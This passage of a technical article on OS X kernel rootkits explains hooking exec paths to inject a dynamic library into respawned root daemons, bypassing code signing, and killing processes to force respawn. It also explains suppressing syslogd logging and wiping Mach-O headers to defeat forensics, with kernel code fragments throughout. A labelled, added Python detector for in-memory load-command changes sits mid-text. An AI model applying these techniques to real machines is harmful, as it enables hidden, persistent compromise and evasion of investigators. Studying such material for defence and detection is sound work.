kr = mach_vm_copy((vm_map_t)task->map, CAST_USER_ADDR_T(dst_addr),
strlen(fname)+1, 0x1000);
// release references created with proc_find() - must be always done!
proc_rele(p);
proc_rele(p_kernel);

To deallocate that newly allocated space in userland, vm_map_remove()
is a good candidate:

/*
 * vm_map_remove:
 * Remove the given address range from the target map.
 * This is the exported form of vm_map_delete.
 */
extern kern_return_t
vm_map_remove(vm_map_t         map,
              vm_map_offset_t  start,
              vm_map_offset_t  end,
              boolean_t        flags);

An easy alternative is to just zero those bytes and assume that space
as a small memory leak. It works and it is not a big deal.

The second solution requires a single function and has no
memory allocation at the target process. We are talking about
vm_map_write_user(): "Copy out data from a kernel space into space in
the destination map. The space must already exist in the destination map."

The prototype:

kern_return_t
vm_map_write_user(vm_map_t map, void *src_p, vm_map_address_t dst_addr,
vm_size_t size);

Where map is the vm_map_t of the target process, and src_p the kernel data
buffer we want to write to the process. The previous example using this
function:

struct proc *p = proc_find(PID);
struct task *task = (struct task*)(p->task);
kern_return_t kr = 0;
vm_prot_t new_protection = VM_PROT_WRITE | VM_PROT_READ;
char *fname = "nemo_and_snare_rule!";
// modify memory permissions
kr = mach_vm_protect(task->map, 0x1000, len, FALSE, new_protection);
kr = vm_map_write_user(task->map, fname, 0x1000, strlen(fname)+1);
proc_rele(p);

This alternative is easier and does not allocate new memory at the target.
Do not forget to restore the original memory permissions.

After so many words you are probably asking why not use copyout to copy
from kernel to userland? Well, of course it is possible but there is
a problem. It can't be used to overwrite arbitrary processes - only
the current process. Even if we try to change the current map to
another process using vm_map_switch(), copyout will always retrieve the
current process so copyout will fail with EFAULT if we try an address
of another process that does not exist in the current one. This means
that it can be used, for example, inside a hooked syscall but not to
write to arbitrary processes.


----[ 4.2 - Abusing (again!) dyld to inject and run code

Most of the time hacking is about abusing features or the lack thereof.
This time we are going to piggyback on dyld and launchd. Poor bastards!
The idea is that launchd will restart our target process and dyld will
be responsible for executing our code. I used the dyld approach in
OS.X/Boubou PoC described at [12] and [34], so why not again? It is easy
to implement and works very well.

The core of this idea is to emulate the DYLD_INSERT_LIBRARIES (equivalent
to LD_PRELOAD for those coming from ELF Unix world) when a new process
is created. The library will be responsible for executing whatever
we want to. In this case we want to modify the Mach-O header before
passing control to dyld. When dyld gains control (it is dyld who passes
control to target's entrypoint not the kernel) it will read the header
from target's memory and process it. This presents an opportunity to
successfully modify and inject the Mach-O header.

The presentations at Secuinside [11] and HitCon [12] discuss the Mach-O
header details and injection process. This is valid for dynamically
linked executables, where execution will start at the dynamic linker
(/usr/lib/dyld) and then continue at the executable entry point.

Launchd is the perfect target because it can automatically respawn daemons
and agents, at root or user privilege level. The idea is to kill a daemon,
intercept the respawn and inject the library we want to be executed. The
privilege level we want to execute at depends on the target daemon.

What we need is to find a good place to intercept the respawn of the
target process and modify its memory before control is passed to dyld.

A simplified version of the binary execution process, adapted from [13] is:

     execve() -> __mac_execve()
                        |
                        v
               exec_activate_image()
                        |
                        v
                    Read file
                        |
                        v
           .----> exec_mach_imgact() -> run dyld -> target entry point
           |            |
           |            v
           |       load_machfile()
           |            |
           |            v
           |      parse_machfile()   [maps the load commands into memory]
           |            |
           |            v
           |       load_dylinker()   [sets image entrypoint to dyld]
           |            |
           |            v
           `--------- (...)

Chapter 7 of [14] and Chapter 13 of [13] thoroughly describe the execution
process in case you are interested in every detail.

The above diagram presents many places where we can modify the new process
memory and its Mach-O header. As previously mentioned, when dyld gains
control it will parse again the Mach-O header so our modification is
guaranteed to be used if made before dyld's control.

We can confirm this by looking at dyld source code [15]:

//
// Entry point for dyld. The kernel loads dyld and jumps to __dyld_start
// which sets up some registers and call this function.
//
// Returns address of main() in target program which __dyld_start jumps to
//
uintptr_t
_main(const macho_header* mainExecutableMH, uintptr_t mainExecutableSlide,
        int argc, const char* argv[], const char* envp[],
        const char* apple[], uintptr_t* startGlue)

One curious detail (without any practical application I can foresee
now) is that dyld does not validate the header - the magic value can
be modified to anything and dyld will happily continue its work. Kernel
data can be trusted, right?


----[ 4.3 - Finding the place to execute the injection

With theory in place it is finally time to move to practice! We need
to find one or more places where we can modify the target process memory
and inject our dynamic library.

The kernel has no symbol stubs so we can't just modify a pointer and
hijack a useful function. One solution is to inline hook the function
prologue and make it jump to our function. We can simplify this by
implementing the whole original function (copy from XNU source into our
rootkit); this way we do not need to return back to the original one,
just restore the original bytes when we finish our evil work.

A good starting point to look for candidate functions is
exec_mach_imgact(). The reason why is that when it returns control
to dyld everything required to execute the new process is set (kernel
side). A spot as near to its end as possible is best.

After exploring exec_mach_imgact, I found a good candidate at
task_set_dyld_info(). It is called twice, once before the image is loaded
into memory, and once after the image is loaded. Clearly, the former
does not interest us so we need to distinguish between each case. This
function is only used at exec_mach_imgact().

Looking at its code in osfmk/kern/task.c:

void
task_set_dyld_info(task_t task, mach_vm_address_t addr,
mach_vm_size_t size)
{
    task_lock(task);
    task->all_image_info_addr = addr;
    task->all_image_info_size = size;
    task_unlock(task);
}

The lock calls are nothing more than macros using a symbol available in
KPIs:

#define task_lock(task)     lck_mtx_lock(&(task)->lock)
#define task_unlock(task)   lck_mtx_unlock(&(task)->lock)

It is a great candidate - we can copy & paste its code into our
rootkit source, add our code to inject the library and then execute
the original function code. Because it is not a static function we can
find its symbol. The first parameter is a task_t structure, which has
a pointer to the corresponding proc_t structure (remember that proc and
task structures are connected to each other via void pointers).

The proposed workflow could be:

1) Find task_set_dyld_info() address.
2) Patch prologue to jump to our function.
3) Execute our function to inject library.
4) Restore original bytes from 2).
5) Execution continues, our library is executed by dyld.

The only problem with this function is here at exec_mach_imgact():

    /*
     * Remember file name for accounting.
     */
    p->p_acflag &= ~AFORK;
    /* If the translated name isn't NULL, then we want to use
     * that translated name as the name we show as the "real" name.
     * Otherwise, use the name passed into exec.
     */
    if (0 != imgp->ip_p_comm[0]) {
        bcopy((caddr_t)imgp->ip_p_comm, (caddr_t)p->p_comm,
            sizeof(p->p_comm));
    } else {
        if (imgp->ip_ndp->ni_cnd.cn_namelen > MAXCOMLEN)
            imgp->ip_ndp->ni_cnd.cn_namelen = MAXCOMLEN;
        bcopy((caddr_t)imgp->ip_ndp->ni_cnd.cn_nameptr, (caddr_t)p->p_comm,
            (unsigned)imgp->ip_ndp->ni_cnd.cn_namelen);
        p->p_comm[imgp->ip_ndp->ni_cnd.cn_namelen] = '\0';
    }

The process name in proc_t structure is only set after the second call
to task_set_dyld_info(), so we can't use it to detect which process
is going to be executed and trigger or not our injection (remember we
are only interested in a specific process to be executed by launchd). A
workaround to this problem is to lookup the open files structure in proc_t
(p_fd field).

An alternative solution is to use another function! There is
an even better one near the end of exec_mach_imgact() called
proc_resetregister(). The advantage of being near the end is that we can
change a lot more things (kernel completed most of its tasks related to
new process execution), opening way for some cute tricks.

Its implementation is also very simple [bsd/kern/kern_proc.c]:

void proc_resetregister(proc_t p)
{
    proc_lock(p);
    p->p_lflag &= ~P_LREGISTER;
    proc_unlock(p);
}

The lock/unlock here are implemented as functions instead of macros and
not exported. We can simply define the macros or change our code to
use lck_mtx_*. This time we have a proc_t structure and can use the
p_comm field to find our target(s) (or proc_name() to get the name of
a given pid). Perfect spot!

With a location where to execute our modifications we can proceed to
the last step, modify the target Mach-O header.


----[ 4.4 - Ideas are great, execution is everything

Assuming that our hijacked function is proc_resetregister(), we can
extract all the information we will need from the proc_t parameter. Let's
proceed with this.

The number of binaries that use ASLR is increasing so the first step is to
find the memory address at which the binary is loaded (the Mach-O header to
be more specific). The ASLR slide is generated inside load_machfile() and
not set in a struct/var or returned. One way to solve the problem is to take
a peek at the virtual memory map (vmap) of the target process. The following
does the job (assuming we are inside our own proc_resetregister()):

struct task *task = (struct task*)p->task;
mach_vm_address_t start_address = task->map->hdr.links.start;

Start contains the lower address of the process, which is where the
Mach-O header is located. This *appears* to always hold true (there
are good reasons to believe it!).

To modify the Mach-O header of the target process we need to parse
the header to find free space where we can add the new LC_LOAD_DYLIB
command. The necessary free space is common - most binaries have enough
slack space between the last command and first code/data.

The header can be retrieved from the user space with vm_map_read_user()
or copyin (because here we are executing in current proc context).
After we have found the free space and the full Mach-O header is in our
buffer, we just need to add a new LC_LOAD_DYLIB command.

The two diagrams below show what needs to be done to the Mach-O header:

.-------------------.
|       HEADER      |<- Fix this struct:
|-------------------| struct mach_header {
|   Load Commands   |   uint32_t        magic;
|  .-------------.  |   cpu_type_t      cputype;
|  |  Command 1  |  |   cpu_subtype_t   cpusubtype;
|  |-------------|  |   uint32_t        filetype;
|  |  Command 2  |  |   uint32_t        ncmds;      <- add +1
|  |-------------|  |   uint32_t        sizeofcmds; <- += size of new cmd
|  |     ...     |  |   uint32_t        flags;
|  |-------------|  |  };
|  |  Command n  |  |
|  |-------------|  |
|  | Command n+1 |  |<- add new command here:
|  `-------------'  | struct dylib_command {
|-------------------|  uint32_t        cmd;
|        Data       |  uint32_t        cmdsize;
| .---------------. |  struct dylib    dylib;
| |   | Section 1 | | };
| | 1 |-----------| | struct dylib {
| |   | Section 2 | |  union lc_str  name;
| `---------------' |  uint32_t timestamp;
| .---------------. |  uint32_t current_version;
| |   | Section 1 | |  uint32_t compatibility_version;
| | 2 |-----------| | };
| |   | Section 2 | | union lc_str {
| `---------------' |  uint32_t        offset;
|       ...         | #ifndef __LP64__ // not used
|                   |  char            *ptr;
|                   | #endif
|                   | };
`-------------------'

A diff between original and modified:

.-------------------.     .-------------------.
|       HEADER      |     |       HEADER      |<- Fix this struct
|-------------------|     |-------------------| struct mach_header {
|   Load Commands   |     |   Load Commands   |  ...
|  .-------------.  |     |  .-------------.  | uint32_t  ncmds;     <- fix
|  |  Command 1  |  |     |  |  Command 1  |  | uint32_t  sizeofcmds;<- fix
|  |-------------|  |     |  |-------------|  |  ...
|  |  Command 2  |  |     |  |  Command 2  |  |  };
|  |-------------|  |     |  |-------------|  |
|  |     ...     |  |     |  |     ...     |  |
|  |-------------|  |     |  |-------------|  |
|  |  Command n  |  |     |  |  Command n  |  |
|  `-------------'  |     |  |-------------|  |
|                   |---->|  | Command n+1 |  |<- add new command here
|                   |---->|  `-------------'  | struct dylib_command {
|-------------------|---->|-------------------|  uint32_t        cmd;
|        Data       |---->|        Data       |  uint32_t        cmdsize;
| .---------------. |---->| .---------------. |  struct dylib    dylib;
| |   | Section 1 | |---->| |   | Section 1 | | };
| | 1 |-----------| |     | | 1 |-----------| |
| |   | Section 2 | |     | |   | Section 2 | |
| `---------------' |     | `---------------' |
| .---------------. |     | .---------------. |
| |   | Section 1 | |     | |   | Section 1 | |
| | 2 |-----------| |     | | 2 |-----------| |
| |   | Section 2 | |     | |   | Section 2 | |
| `---------------' |     | `---------------' |
|       ...         |     |       ...         |
`-------------------'     `-------------------'

There are other methods to inject the library if there is not enough
space. One that requires only 24 bytes is described at [16].

This approach has one interesting advantage - it is not detectable by code
signing because the injection occurs after its checks and flags are set.
This is the code that sets the flags:

    /*
     * Set code-signing flags if this binary is signed, or if parent has
     * requested them on exec.
     */
    if (load_result.csflags & CS_VALID) {
        imgp->ip_csflags |= load_result.csflags &
            (CS_VALID|
             CS_HARD|CS_KILL|CS_EXEC_SET_HARD|CS_EXEC_SET_KILL);
    } else {
        imgp->ip_csflags &= ~CS_VALID;
    }

    if (p->p_csflags & CS_EXEC_SET_HARD)
        imgp->ip_csflags |= CS_HARD;
    if (p->p_csflags & CS_EXEC_SET_KILL)
        imgp->ip_csflags |= CS_KILL;

The code snippet is from exec_mach_imgact() and located well before our
two candidate functions described in section 4.3. Code signing does not
kill the process immediately. The flags are verified later and a kill
signal sent if code signing was configured to exit on failure (which we
can also modify here).
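
Since the modification lands after the code-signing checks, one detection
angle is to compare the load commands of a process's in-memory Mach-O header
with those of the binary on disk. The Python below is an added example, not
code from this article; it assumes thin little-endian 64-bit images already
read into byte strings, and the sample headers, the build_* helpers and the
path /tmp/example.dylib are constructed for illustration.

```python
import struct
from collections import Counter

MH_MAGIC_64 = 0xFEEDFACF
LC_REQ_DYLD = 0x80000000
HDR_SIZE = 32  # sizeof(struct mach_header_64)
# Load commands that make dyld map a library (values from <mach-o/loader.h>).
DYLIB_CMDS = {
    0x0C: "LC_LOAD_DYLIB",
    0x18 | LC_REQ_DYLD: "LC_LOAD_WEAK_DYLIB",
    0x1F | LC_REQ_DYLD: "LC_REEXPORT_DYLIB",
    0x20: "LC_LAZY_LOAD_DYLIB",
    0x23 | LC_REQ_DYLD: "LC_LOAD_UPWARD_DYLIB",
}


class HeaderError(ValueError):
    """The buffer does not hold a well-formed 64-bit Mach-O header."""


def parse_dylibs(buf):
    """Return (ncmds, sizeofcmds, [(command name, library path), ...])."""
    if len(buf) < HDR_SIZE:
        raise HeaderError("buffer shorter than mach_header_64")
    magic, _, _, _, ncmds, sizeofcmds, _, _ = struct.unpack_from("<8I", buf, 0)
    if magic != MH_MAGIC_64:
        raise HeaderError("bad magic 0x%08x" % magic)
    end = HDR_SIZE + sizeofcmds
    if end > len(buf):
        raise HeaderError("sizeofcmds runs past the buffer")
    off, dylibs = HDR_SIZE, []
    for _ in range(ncmds):
        if off + 8 > end:
            raise HeaderError("load command table truncated")
        cmd, cmdsize = struct.unpack_from("<2I", buf, off)
        # A zero or oversized cmdsize would loop forever or read stray data.
        if cmdsize < 8 or cmdsize % 8 or off + cmdsize > end:
            raise HeaderError("bad cmdsize %d at offset %d" % (cmdsize, off))
        if cmd in DYLIB_CMDS:
            # dylib_command: cmd, cmdsize, name.offset, timestamp, versions
            name_off = struct.unpack_from("<I", buf, off + 8)[0] if cmdsize >= 24 else 0
            if not 24 <= name_off < cmdsize:
                raise HeaderError("bad dylib name offset at offset %d" % off)
            raw = buf[off + name_off:off + cmdsize]
            path = raw.split(b"\0", 1)[0].decode("utf-8", "replace")
            dylibs.append((DYLIB_CMDS[cmd], path))
        off += cmdsize
    return ncmds, sizeofcmds, dylibs


def compare_headers(disk, mem):
    """Return a list of findings; an empty list means the headers agree."""
    try:
        d_ncmds, d_size, d_libs = parse_dylibs(disk)
    except HeaderError as exc:
        return ["on-disk header unparsable: %s" % exc]
    try:
        m_ncmds, m_size, m_libs = parse_dylibs(mem)
    except HeaderError as exc:
        return ["in-memory header unparsable: %s" % exc]
    findings = []
    if (d_ncmds, d_size) != (m_ncmds, m_size):
        findings.append("ncmds/sizeofcmds differ: disk=%d/%d memory=%d/%d"
                        % (d_ncmds, d_size, m_ncmds, m_size))
    # Counter subtraction keeps duplicates apart (same library listed twice).
    for name, path in sorted(Counter(m_libs) - Counter(d_libs)):
        findings.append("%s only in memory: %s" % (name, path))
    for name, path in sorted(Counter(d_libs) - Counter(m_libs)):
        findings.append("%s only on disk: %s" % (name, path))
    if not findings and disk[:HDR_SIZE + d_size] != mem[:HDR_SIZE + m_size]:
        findings.append("header bytes differ although the dylib list matches")
    return findings


# --- constructed sample data (not taken from a real binary) ---
def build_dylib_cmd(path, cmd=0x0C):
    name = path.encode() + b"\0"
    name += b"\0" * (-(24 + len(name)) % 8)  # pad command to 8 bytes
    return struct.pack("<6I", cmd, 24 + len(name), 24, 2, 0x10000, 0x10000) + name


def build_header(cmds, slack=64):
    body = b"".join(cmds)
    hdr = struct.pack("<8I", MH_MAGIC_64, 0x01000007, 3, 2,
                      len(cmds), len(body), 0x00200085, 0)
    return hdr + body + b"\0" * slack  # slack = zero padding before code


UUID_CMD = struct.pack("<2I16s", 0x1B, 24, bytes(16))  # LC_UUID
LIBSYSTEM = build_dylib_cmd("/usr/lib/libSystem.B.dylib")
DISK = build_header([UUID_CMD, LIBSYSTEM])
MEM_CLEAN = DISK
MEM_INJECTED = build_header(
    [UUID_CMD, LIBSYSTEM, build_dylib_cmd("/tmp/example.dylib")], slack=16)
MEM_WIPED = bytes(len(DISK))  # header zeroed in memory

if __name__ == "__main__":
    for label, mem in (("clean", MEM_CLEAN), ("injected", MEM_INJECTED),
                       ("wiped", MEM_WIPED)):
        print(label, compare_headers(DISK, mem) or "no differences")
```

On a live system the in-memory bytes would come from a memory image or a
debugger, and for a fat binary the comparison has to be made against the
matching architecture slice.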

The only puzzle piece left is which process we should use and how to kill
it. There are many root processes controlled by launchd so it is just
a matter of selecting one with invisible and/or small impact. Spotlight
is for example a good candidate. A code snippet to do the killing:

proc_t victim = proc_find(TARGET_PID);
if (victim != PROC_NULL)
{
    // we need to release reference count from proc_find() before kill
    proc_rele(victim);
    // now we can kill the process or use SIGSEGV coz' Spotlight crashes,
    // right? :-)
    psignal(victim, SIGKILL);
}

When launchd respawns the process, we can intercept it at
exec_mach_imgact() and do our magic. The rest is responsibility of the
dynamic library.


----[ 4.5 - The dynamic library

The dynamic library is very easy to create if you use the Xcode template
(oh the drama, hackers use Makefiles!) or just Google for a simple
Makefile.

To execute the library code you can add an entrypoint via a constructor:

extern void init(void) __attribute__ ((constructor));
void init(void)
{
    // do evil stuff here
}

init will be executed as soon as the library is loaded. Another way
could be by modifying the injected process symbol stub and redirect
to an entrypoint function inside the library. While the symbol stub
modification could be made from the kernel, we do not know yet where
library will be loaded so it is harder to execute this. For example, it
could be delayed by hijacking a syscall, wait for its execution and then
modify a symbol. The downside is more time for detection as explained
in next section. Honestly I have not thought much about this case.

To execute commands from the library it is just a matter of fork'ing
and exec'ing whatever command we need. We can also create a new thread
(or multiple) to leave a resident backdoor and so on. Or just execute
the command we need and clean up ourselves to leave no traces.

It is up to you and your particular requirements and imagination :-).


----[ 4.6 - Hiding our tracks

By principle, a rootkit should be as stealthy as possible - we need to
cover our tracks to the maximum possible extent. Let me discuss a few
problems and potential solutions with the previously described approaches.

The first one is that we need to restart a target process. This will
leave an immediate clue on a (potentially very) higher PID, depending
when the method is used (near startup it is ok).

Another clue is that we are sending a signal to the target process
and syslogd will capture it. Instead of a kill we could send a SIGSEGV
(Apple's software has bugs, right?), or just temporarily memory patch
syslogd daemon to avoid logging our little trick. Different possibilities
to solve this problem!

The SIGSEGV is particularly interesting since the resulting crash dump
has no useful information and it only leaves this log trail:

12/21/12 3:27:13.093 AM com.apple.launchd[1]: (com.apple.metadata.mds[277])
Job appears to have crashed: Segmentation fault: 11

Patching (temporarily or not) syslogd is rather easy to accomplish. Looking
at Apple's syslogd source we can find the following function in
syslogd/daemon.c:

void process_message(aslmsg msg, uint32_t source)

Near the end it has this code:

/* send message to output modules */
asl_out_message(msg);
if (global.bsd_out_enabled) bsd_out_message(msg);

The asl_out_message() appears to be the interesting place to patch. To
quickly test this theory we can attach gdb to syslogd (warning, ASLR
enabled), and patch that function. We need to search the function address
because there are no debug symbols available.

Let's look at its implementation:

void asl_out_message(aslmsg msg)
{
    dispatch_flush_continuation_cache();
    asl_msg_retain((asl_msg_t *)msg);
    dispatch_async(asl_action_queue, ^{
        _asl_action_message(msg);
        asl_msg_release((asl_msg_t *)msg);
    });
}

There are two external symbols, dispatch_flush_continuation_cache()
and asl_msg_retain(). The former has only a reference and the latter
two. To find the location of asl_out_message() we just need to find out
the proc_t for syslogd process, read and process its symbol table (we
can read from memory or filesystem), correct for ASLR slide, and find
the address of the stub. Since this is not IDA we can't easily find the
cross-references (oh, IDA spoils us).

What we can do is search in the binary the calls to the symbol stub
(it is a relative offset call). Even easier (and probably faster)
is to disassemble and match the address of the call with the stub -
the disassembler will output the final address.

After we have the address where dispatch_flush_continuation_cache() is
called from we just need to find the function prologue and patch it with
a ret (function return is void so no need for xor eax,eax). We can then
restore the original byte after we execute our command. Another function,
bsd_out_message() might need to be patched, but I leave that task to you,
the reader.

Another alternative is to try to recycle the PID that was killed. The
forkproc() function is the one that allocates the new PID for the
child. Might be interesting to research and explore this alternative. You
also might want to reorder the proc list and move the new element to the
original location instead of being in newer location. Many possibilities
to hide and try to detect the rootkit actions. That is why it is fun!

The next issue is that process memory will have our injected library so
we want to remove it as soon as possible. I did some interesting work
in this area but NDA oblige and can't disclose it. It can be done and
you should think about it, or just use a brute approach and kill the
process again and this time do not inject anything. Whatever works :-)

There is no need to have a resident library somewhere at the filesystem
ready to be discovered. We can read and write from and to anywhere in the
filesystem so we can store the library code encrypted inside the kernel
module or store it somewhere else, for example in a sqlite3 database
(there are so many spread all over OS X). Before the injection we can
unpack it somewhere, execute it, and then remove when not needed anymore.

One thing I had no time to verify is the impact from Spotlight if we
use the unpacking to filesystem approach. It might be able to detect
the new file and store in its database, so we must be careful over here.


--[ 5 - Revisiting userland<->kernel communication

Fortunately there are many options to establish communication between
kernel and userland applications in OS X. The sysctl interface previously
presented [1] is easy to implement but it is too cumbersome to transfer
large amounts of data. Let me present you additional options.


----[ 5.1 - Character devices and ioctl

The easiest way to have userland<->kernel communication is to create
a character device and use the ioctl interface to control it. We just
need to create and register the new device and add the necessary entry
point functions.

It all starts with the structure cdevsw:

/*
 * Character device switch table
 */
struct cdevsw {
    open_close_fcn_t    *d_open;
    open_close_fcn_t    *d_close;
    read_write_fcn_t    *d_read;
    read_write_fcn_t    *d_write;
    ioctl_fcn_t         *d_ioctl;
    stop_fcn_t          *d_stop;
    reset_fcn_t         *d_reset;
    struct tty          **d_ttys;
    select_fcn_t        *d_select;
    mmap_fcn_t          *d_mmap;
    strategy_fcn_t      *d_strategy;
    void                *d_reserved_1;
    void                *d_reserved_2;
    int                 d_type;
};

The most interesting entrypoints for our purposes are open, close,
ioctl. If you are interested in using this communication channel, you
probably should think about encrypting it or some kind of authentication
method. OS.X/Crisis has no authentication whatsoever so anyone can send
commands to the kernel rootkit after (easily) finding all the possible
ioctl commands.

The code is very simple so there is no point in discussing it here. The
provided source code implements this and kernel control so you can browse
it and verify how it is done.

Besides the problems with encryption, authentication and ioctl commands
reversing, this solution creates a new character device that needs
to be hidden or else it will be too easy to detect. And then we have
additional traces inside the kernel structures that need to be hidden,
creating a vicious circle (rootkits are a vicious circle of hide &
seek and that is why they can be so fun to write about).


----[ 5.2 - Kernel Control KPI

The kernel control KPI is interesting because it allows bidirectional
communication with userland and transfer of large amounts of data. Its
implementation is rather simple via a regular socket (PF_SYSTEM). Apple's
reference documentation can be found at [17] and sample code at [18].

A kernel extension is responsible for creating the socket and the userland
part will read and send data to that same socket (socket access can be
restricted to privileged users or everyone).

The kernel implementation is done by registering a control structure
kern_ctl_reg defined at bsd/sys/kern_control.h. From Apple's example:

// the reverse dns name to be used between kernel and userland
#define BUNDLE_ID   "put.as.hydra"

static struct kern_ctl_reg g_ctl_reg = {
 BUNDLE_ID,      /* use a reverse dns name */
 0,              /* set to 0 for dynamically assigned control ID */
 0,              /* ctl_unit - ignored when CTL_FLAG_REG_ID_UNIT not set */
 /* privileged access required to access this filter */
 CTL_FLAG_PRIVILEGED,
 0,               /* use default send size buffer */
 0,               /* Override receive buffer size */
 ctl_connect,     /* Called when a connection request is accepted */
 ctl_disconnect,  /* called when a connection becomes disconnected */
 NULL,         /* handles data sent from the client to kernel control */
 ctl_set,      /* called when the user process makes the setsockopt call */
 ctl_get       /* called when the user process makes the getsockopt call */
};

The connect and disconnect functions handle userland connections. When a
new connection is established we need to retain the unit id and control
reference - they are required for sending data and removing the kernel
control.

The ctl_get function handles the communication from kernel to userland -
sends data to the socket when client requests it, and ctl_set handles
data from userland to kernel. The kernel data to be sent to userland
should be enqueued using ctl_enqueuedata() (this is where we need the
unit id and control reference).

A quick example of a function to enqueue the PID of a process:

static u_int32_t gClientUnit = 0;
static kern_ctl_ref gClientCtlRef = NULL;
/*
 * get data ready for userland to grab
 * send PID of the suspended process and let the userland daemon do the
 * rest
 */
kern_return_t
queue_userland_data(pid_t pid)
{
    errno_t error = 0;
    if (gClientCtlRef == NULL) return KERN_FAILURE;

    error = ctl_enqueuedata(gClientCtlRef, gClientUnit, &pid,
    sizeof(pid_t), 0);

    if (error) printf("[ERROR] ctl_enqueuedata failed with error: %d\n",
    error);
    return error;
}

Another important detail is about the control ID. Since the recommended
way is to use a dynamically assigned control ID, the userland client
needs somehow to retrieve it. This can be done using an ioctl request
(the reverse dns name must be shared between the kernel and userland).

int gSocket = -1;
int ret = -1;
struct ctl_info ctl_info;
struct sockaddr_ctl sc;
gSocket = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
// the control ID is dynamically generated so we must obtain sc_id using
// ioctl
memset(&ctl_info, 0, sizeof(ctl_info));
strncpy(ctl_info.ctl_name, "put.as.hydra", MAX_KCTL_NAME);
ctl_info.ctl_name[MAX_KCTL_NAME-1] = '\0';
if (ioctl(gSocket, CTLIOCGINFO, &ctl_info) == -1)
{
    perror("ioctl CTLIOCGINFO");
    exit(1);
}
else
    printf("ctl_id: 0x%x for ctl_name: %s\n", ctl_info.ctl_id,
           ctl_info.ctl_name);
// build the sockaddr control structure and finally connect to the socket
bzero(&sc, sizeof(struct sockaddr_ctl));
sc.sc_len = sizeof(struct sockaddr_ctl);
sc.sc_family = AF_SYSTEM;
sc.ss_sysaddr = AF_SYS_CONTROL;
sc.sc_id = ctl_info.ctl_id;
sc.sc_unit = 0;
ret = connect(gSocket, (struct sockaddr*)&sc, sizeof(sc));

After connection to the socket is established, the userland client can
send data using setsockopt() and receive with recv(). The remaining
implementation details are easy to understand by reading Apple's
referenced sample code.

This communication channel might not be that interesting for rootkit'ing
purposes because it requires additional effort to hide, in particular
the socket information that can be explored by memory forensic tools. If
commercial spyware is using character devices for communication then we
can't forget this possibility when analysing a potentially compromised
machine.

Nevertheless it can be interesting for other purposes. As an example,
I created a PoC (to be released later) to stop certain processes when
they are created ( p->p_stat = SSTOP) and communicate their PID to a
userland daemon. The userland daemon attaches to the process and modifies
whatever it needs. In this particular case it is used to patch code
signed applications without needing to resign and patch any checksum
checks. We already saw that OS X code-signing verifications are done
before the process is stopped and do not detect these modifications
(application own run-time code checksum checks are another story!). It
is not the best solution but just a nice set of tricks and demo usage
of this communication channel.


----[ 5.3 - Alternative channels

The two presented solutions are easy to setup and use but also easy
to detect. Their main problem is that they leave "permanent" traces
that need to be hidden (kernel structures for example). This increases
rootkit's complexity and chances of being detected.

Covert channels are a lot more appropriate and a lot has been written
about them. Since it is so easy to use almost any kernel function, the
possibilities to be creative in this department are much higher. Data can
be stealthily read and written anywhere in the filesystem, bypassing many
detection and instrumentation mechanisms as it will be shown next. At
the limit there is no real need for a direct communication channel! For
example, data can be encoded in a binary and intercepted when it is
executed. The possibilities are really endless. This very short section
is just a reminder that rootkit design can be different from what is
usually done and that you should think about it, whether you belong to
the offensive or defensive side.


--[ 6 - Anti-forensics

Mac OS X kernel is instrumentation rich, featuring DTrace and
others. These can assist in rootkit uncloaking. Memory forensics is
also playing an important role these days in malware detection and
analysis. This section's goal is to present some ideas on how to attack or
hide from these technologies. It is not an exhaustive list but it tries
to cover the main ones. OS X kernel is still big and full of interesting
places to be explored. Keep that in mind! Due to time constraints it is
not possible to write about fooling/defeating the memory forensics tools
as I initially planned. It was somewhat similar to what was presented at
29C3 in Defeating Windows memory forensics presentation [33] and other
similar work presented in the past.


----[ 6.1 - Cheap tricks to reduce our footprint

An extremely easy trick to pull without any side consequences for us
is to remove the Mach-O header from process's memory. A memory dump
will require additional effort to find and rebuild the original binary
(harder in userland binaries, simpler in kernel extensions). Do not
forget that Mach-O header permissions are R-X so make it writable first.

Kernel extensions must have a start and stop function. Their prototype
specifies a kmod_info_t structure as first parameter. It is part of a
linked list of all loaded kernel extensions (used to hide the rootkit
from kextstat but now marked deprecated) and contains a very useful
field to apply this cheap trick.

typedef struct kmod_info {
    struct kmod_info  * next;
    int32_t             info_version;          // version of this structure
    uint32_t            id;
    char                name[KMOD_MAX_NAME];
    char                version[KMOD_MAX_NAME];
    int32_t             reference_count;       // # linkage refs to this
    kmod_reference_t  * reference_list;        // who this refs (links on)
    vm_address_t        address;               // starting address
    vm_size_t           size;                  // total size
    vm_size_t           hdr_size;              // unwired hdr size
    kmod_start_func_t * start;
    kmod_stop_func_t  * stop;
} kmod_info_t;

The "address" field contains the starting address of the currently loaded
kext, including the ASLR slide (kernel and kernel extensions Mach-O header
values include the current kernel ASLR slide). With this information we
just need to find out the total size of the header and nuke it:

int nuke_mach_header(mach_vm_address_t address)
{
    struct mach_header_64 *mh = (struct mach_header_64*)address;
    uint32_t header_size = 0;
    if (mh->magic == MH_MAGIC_64)
    {
        header_size = mh->sizeofcmds + sizeof(struct mach_header_64);
    }
    else return 1;
    // we have total header size and startup address
    // disable CR0 write protection
    disable_wp();
    memset((void*)address, 0, header_size);
    enable_wp();
    return 0;
}

Instead of just zero'ing the header you could fill it with random junk
data for fun. You can even mangle data from the other commands (LINKEDIT,
LC_SYMTAB, LC_DYSYMTAB, LC_UUID). For example, there are no symbol stubs
in kernel - symbols are solved when kernel extension is loaded and calls
are made directly to the referenced symbol. This is a problem because
it can be used to detect valid code and get hints on what it is trying
to do. One can generate a table of all kernel symbols and use it to find
cross references in kernel memory and dump that code.

Function pointers can help to hide our code - the question is how easy or
not it is to bootstrap the rootkit to search the required symbols. One
solution can be to use the techniques described before to find the
symbols and then mangle the bootstrap code - only leave in memory code
using function pointers. Be creative, try to reduce your footprint to
the maximum :-).


----[ 6.2 - Attacking DTrace and other instrumentation features

Mac OS X has many instrumentation features available. There are at
least DTrace, FSEvents, Kauth, kdebug, and TrustedBSD. TrustedBSD's
original goal is not instrumentation related but can be used (or abused)
for this purpose. Kauth is explored in Section 6.3 with AV-Monster II,
while all the others in the next subsections.


------[ 6.2.1 - FSEvents

FSEvents is an API for file system notification. Applications register
for events that are interested in and receive them via /dev/fsevents. A
file system monitor can be built on top of this - the usual suspects
[13] and [14] offer a good explanation about its internals and code
samples. Jonathan Levin has a "filemon" tool available at his book
companion web site.

The responsibility to add the events belongs to the function add_fsevent()
[bsd/vfs/vfs_fsevents.c]. It is a rather long vararg function and I do
not want to spend space and time analysing it. Amit Singh has a nice
figure on page 1421 of [14] with functions that add events. For example,
the open syscall can generate a file create event (FSE_CREATE_FILE).

